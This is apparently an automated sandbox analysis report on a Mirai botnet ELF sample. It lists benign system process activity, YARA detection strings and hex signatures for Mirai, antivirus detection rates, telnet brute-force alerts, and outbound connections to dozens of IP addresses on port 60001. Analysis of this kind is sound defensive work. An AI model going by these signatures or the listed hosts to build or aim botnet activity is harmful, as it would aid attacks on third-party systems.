  • systemd New Fork (PID: 5766, Parent: 1)
  • agetty (PID: 5766, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5767, Parent: 1)
  • journalctl (PID: 5767, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5768, Parent: 1)
  • systemd-journald (PID: 5768, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5770, Parent: 1)
  • gdm3 (PID: 5770, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5774, Parent: 5770)
    • plymouth (PID: 5774, Parent: 5770, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 5791, Parent: 5770)
    • gdm-session-worker (PID: 5791, Parent: 5770, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm3 New Fork (PID: 5792, Parent: 5770)
    • Default (PID: 5792, Parent: 5770, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
    • gdm3 New Fork (PID: 5793, Parent: 5770)
    • Default (PID: 5793, Parent: 5770, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5775, Parent: 1860)
  • dbus-daemon (PID: 5775, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5776, Parent: 1)
  • accounts-daemon (PID: 5776, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5782, Parent: 5776, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5783, Parent: 5782, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5784, Parent: 5783, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5785, Parent: 5784)
          • locale (PID: 5785, Parent: 5784, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5786, Parent: 5784)
          • grep (PID: 5786, Parent: 5784, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 5789, Parent: 1)
  • whoopsie (PID: 5789, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5790, Parent: 1)
  • journalctl (PID: 5790, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5795, Parent: 1)
  • dbus-daemon (PID: 5795, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5798, Parent: 1)
  • systemd-logind (PID: 5798, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5857, Parent: 1860)
  • pulseaudio (PID: 5857, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5859, Parent: 1)
  • rtkit-daemon (PID: 5859, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5863, Parent: 1)
  • polkitd (PID: 5863, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5870, Parent: 1)
  • gpu-manager (PID: 5870, Parent: 1, MD5: 8fae9dd5dd67e1f33d873089c2fd8761) Arguments: /usr/bin/gpu-manager --log /var/log/gpu-manager.log
    • sh (PID: 5871, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5872, Parent: 5871)
      • grep (PID: 5872, Parent: 5871, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5874, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5875, Parent: 5874)
      • grep (PID: 5875, Parent: 5874, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5879, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5880, Parent: 5879)
      • grep (PID: 5880, Parent: 5879, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5882, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5883, Parent: 5882)
      • grep (PID: 5883, Parent: 5882, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5884, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5885, Parent: 5884)
      • grep (PID: 5885, Parent: 5884, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5887, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5888, Parent: 5887)
      • grep (PID: 5888, Parent: 5887, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    • sh (PID: 5890, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
      • sh New Fork (PID: 5891, Parent: 5890)
      • grep (PID: 5891, Parent: 5890, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    • sh (PID: 5892, Parent: 5870, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
      • sh New Fork (PID: 5893, Parent: 5892)
      • grep (PID: 5893, Parent: 5892, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
  • systemd New Fork (PID: 5873, Parent: 1)
  • rsyslogd (PID: 5873, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5881, Parent: 1)
  • agetty (PID: 5881, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5886, Parent: 1)
  • journalctl (PID: 5886, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5889, Parent: 1)
  • systemd-journald (PID: 5889, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5898, Parent: 1860)
  • dbus-daemon (PID: 5898, Parent: 1860, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5899, Parent: 1)
  • generate-config (PID: 5899, Parent: 1, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/gdm/generate-config
    • pkill (PID: 5900, Parent: 5899, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pkill --signal HUP --uid gdm dconf-service
  • systemd New Fork (PID: 5903, Parent: 1)
  • gdm-wait-for-drm (PID: 5903, Parent: 1, MD5: 82043ba752c6930b4e6aaea2f7747545) Arguments: /usr/lib/gdm3/gdm-wait-for-drm
  • systemd New Fork (PID: 5904, Parent: 1)
  • journalctl (PID: 5904, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • systemd New Fork (PID: 5907, Parent: 1)
  • whoopsie (PID: 5907, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • systemd New Fork (PID: 5914, Parent: 1)
  • systemd-logind (PID: 5914, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5971, Parent: 1)
  • dbus-daemon (PID: 5971, Parent: 1, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
  • systemd New Fork (PID: 5974, Parent: 1860)
  • pulseaudio (PID: 5974, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • systemd New Fork (PID: 5975, Parent: 1)
  • rtkit-daemon (PID: 5975, Parent: 1, MD5: df0cacf1db4ec95ac70f5b6e06b8ffd7) Arguments: /usr/libexec/rtkit-daemon
  • systemd New Fork (PID: 5978, Parent: 1)
  • polkitd (PID: 5978, Parent: 1, MD5: 8efc9b4b5b524210ad2ea1954a9d0e69) Arguments: /usr/lib/policykit-1/polkitd --no-debug
  • systemd New Fork (PID: 5983, Parent: 1)
  • rsyslogd (PID: 5983, Parent: 1, MD5: 0b8087fc907c42eb3c81a691db258e33) Arguments: /usr/sbin/rsyslogd -n -iNONE
  • systemd New Fork (PID: 5988, Parent: 1)
  • agetty (PID: 5988, Parent: 1, MD5: 3a374724ba7e863768139bdd60ca36f7) Arguments: /sbin/agetty -o "-p -- \\u" --noclear tty2 linux
  • systemd New Fork (PID: 5991, Parent: 1)
  • journalctl (PID: 5991, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --smart-relinquish-var
  • systemd New Fork (PID: 5992, Parent: 1)
  • systemd-journald (PID: 5992, Parent: 1, MD5: 474667ece6cecb5e04c6eb897a1d0d9e) Arguments: /lib/systemd/systemd-journald
  • systemd New Fork (PID: 5993, Parent: 1)
  • gdm3 (PID: 5993, Parent: 1, MD5: 2492e2d8d34f9377e3e530a61a15674f) Arguments: /usr/sbin/gdm3
    • gdm3 New Fork (PID: 5996, Parent: 5993)
    • plymouth (PID: 5996, Parent: 5993, MD5: 87003efd8dad470042f5e75360a8f49f) Arguments: plymouth --ping
    • gdm3 New Fork (PID: 6011, Parent: 5993)
  • systemd New Fork (PID: 5997, Parent: 1)
  • accounts-daemon (PID: 5997, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6001, Parent: 5997, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6002, Parent: 6001, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6003, Parent: 6002, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6004, Parent: 6003)
          • locale (PID: 6004, Parent: 6003, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6005, Parent: 6003)
          • grep (PID: 6005, Parent: 6003, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6008, Parent: 1)
  • journalctl (PID: 6008, Parent: 1, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: /usr/bin/journalctl --flush
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
01oHMcUgUM | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
  • 0x11d50:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11dc0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11e30:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11ea0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x11f10:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12178:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x121cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12220:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x12274:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x122c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
01oHMcUgUM | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
  • 0x10624:$x1: POST /cdn-cgi/
  • 0x11bec:$s1: LCOGQGPTGP
  • 0x117a4:$s4: QWRGPTKQMP
01oHMcUgUM | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
  • 0x10624:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A
01oHMcUgUM | JoeSecurity_Mirai_5 | Yara detected Mirai | Joe Security
01oHMcUgUM | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security

      PCAP (Network Traffic)

      Source | Rule | Description | Author | Strings
      dump.pcap | JoeSecurity_Mirai_12 | Yara detected Mirai | Joe Security

        Memory Dumps

        Source | Rule | Description | Author | Strings
        5272.1.00000000271eff95.00000000354abf44.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
        • 0x178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x1cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x2c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5274.1.00000000271eff95.00000000354abf44.rw-.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
        • 0x178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x1cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x2c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth
        • 0x11d50:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11dc0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11e30:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11ea0:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x11f10:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12178:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x121cc:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12220:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x12274:$xo1: oMXKNNC\x0D\x17\x0C\x12
        • 0x122c8:$xo1: oMXKNNC\x0D\x17\x0C\x12
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp | Mirai_Botnet_Malware | Detects Mirai Botnet Malware | Florian Roth
        • 0x10624:$x1: POST /cdn-cgi/
        • 0x11bec:$s1: LCOGQGPTGP
        • 0x117a4:$s4: QWRGPTKQMP
        5271.1.00000000cb929c31.00000000ca8c47d7.r-x.sdmp | MAL_ELF_LNX_Mirai_Oct10_2 | Detects ELF malware Mirai related | Florian Roth
        • 0x10624:$c01: 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A

        Jbx Signature Overview

        AV Detection:

        Multi AV Scanner detection for submitted file
        Source: 01oHMcUgUM, Virustotal: Detection: 54%
        Source: 01oHMcUgUM, ReversingLabs: Detection: 62%
        Source: /usr/bin/pulseaudio (PID: 5372), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5494), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5635), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5675), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5747), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5857), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pkill (PID: 5900), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: /usr/bin/pulseaudio (PID: 5974), Reads CPU info from /sys: /sys/devices/system/cpu/online
        Source: unknown, HTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
        Source: unknown, HTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

        Networking:

        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37834
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37834
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37864
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37864
        Source: Traffic, Snort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48104
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48104
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48104
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37944
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37944
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37978
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37978
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:37994
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:37994
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38018
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38018
        Source: Traffic, Snort IDS: 716 INFO TELNET access 172.108.130.73:23 -> 192.168.2.23:48172
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 172.108.130.73:23 -> 192.168.2.23:48172
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 172.108.130.73:23 -> 192.168.2.23:48172
        Source: Traffic, Snort IDS: 1251 INFO TELNET Bad Login 92.151.193.247:23 -> 192.168.2.23:38028
        Source: Traffic, Snort IDS: 718 INFO TELNET login incorrect 92.151.193.247:23 -> 192.168.2.23:38028
        Connects to many ports of the same IP (likely port scanning)
        Source: global traffic, TCP traffic: 104.244.72.234 ports 64938,3,4,6,8,9
        Uses known network protocols on non-standard ports
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.204.198.37:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 147.66.174.60:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 175.175.177.60:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 90.60.149.132:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 189.170.165.16:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.114.246.52:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 101.53.128.241:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 180.133.27.54:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 93.81.91.14:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.197.95.52:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 180.37.15.234:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 124.36.207.25:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 191.76.175.71:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.28.239.217:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 119.177.155.178:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 77.35.38.223:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.64.245.173:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 49.208.13.133:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 32.1.47.24:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 65.49.211.164:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.57.117.80:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 161.198.185.223:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.217.26.186:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 34.94.4.165:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 1.57.11.162:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 168.243.204.61:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 72.173.213.204:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 188.8.125.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 117.111.137.251:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 144.208.84.102:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 190.239.120.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.130.215.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 166.56.77.128:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 39.152.104.0:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 203.165.191.153:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 183.168.233.137:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 223.161.7.6:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 114.252.52.59:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 163.194.98.72:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 19.113.99.210:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 18.19.244.36:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 140.151.47.182:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 141.155.190.93:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 81.72.15.235:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 176.63.190.64:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 204.4.242.5:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 159.94.98.86:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 128.145.62.55:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 85.132.243.39:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.45.12.175:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 199.199.253.100:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.169.94.68:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 213.157.15.243:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 156.177.150.164:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 44.109.231.93:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 103.80.146.238:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 68.24.233.252:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 25.138.235.26:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 131.130.149.154:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 38.200.213.40:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 89.163.249.195:60001
        Source: global trafficTCP traffic: 192.168.2.23:42028 -> 61.51.115.20:60001
